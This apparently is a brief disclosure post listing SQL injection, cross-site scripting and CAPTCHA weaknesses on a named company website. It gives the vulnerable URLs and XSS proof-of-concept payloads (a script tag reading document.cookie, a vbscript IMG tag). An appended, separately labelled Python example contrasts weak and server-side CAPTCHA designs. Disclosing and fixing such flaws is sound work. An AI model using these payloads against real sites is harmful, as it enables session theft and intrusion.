SQL Injection
www.pigrecotechnology.it/Archivio/goRicerca.asp?tipologia=tesi
SQL injection and XSS
http://www.pigrecotechnology.it/Search/contRicerca.asp
in the search form
"><script>alert(document.cookie);</script><"
XSS
http://www.pigrecotechnology.it/riservata.asp?messaggio=%3CIMG%20SRC=%27vbscript:msgbox%28%22hello%22%29%27%3E
Useless CAPTCHA
http://www.pigrecotechnology.it/riservata.asp
The CAPTCHA code (the digits) can be read from the names of the images, so a very simple bot can easily bypass it. It's just useless.
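The CAPTCHA weakness described above, set beside a server-side design, as an added example that is not part of the original post. The /captcha/ paths, the CaptchaStore class and the in-memory dictionary standing in for session storage are assumptions made for illustration.

```python
import hmac
import secrets


def weak_image_urls(code):
    # Weak pattern from the finding above: each image is named after the
    # digit it shows, so the page source discloses the whole answer.
    # (The /captcha/<digit>.gif layout is a constructed stand-in.)
    return [f"/captcha/{digit}.gif" for digit in code]


class CaptchaStore:
    """Server-side challenge store; a dict stands in for session storage."""

    def __init__(self):
        self._pending = {}  # opaque token -> expected code

    def issue(self, length=5):
        # Generate the answer and an unrelated random token on the server.
        code = "".join(secrets.choice("0123456789") for _ in range(length))
        token = secrets.token_urlsafe(16)
        self._pending[token] = code
        # Only the opaque token reaches the client. The image is rendered
        # server-side for that token (rendering is out of scope here).
        return token, f"/captcha/image?t={token}"

    def verify(self, token, answer):
        # pop() makes each challenge single-use, whether the answer is
        # right or wrong, so a bot cannot retry against the same image.
        expected = self._pending.pop(token, None)
        if expected is None:
            return False
        # Constant-time comparison of the submitted answer.
        return hmac.compare_digest(expected.encode(), answer.encode())
```
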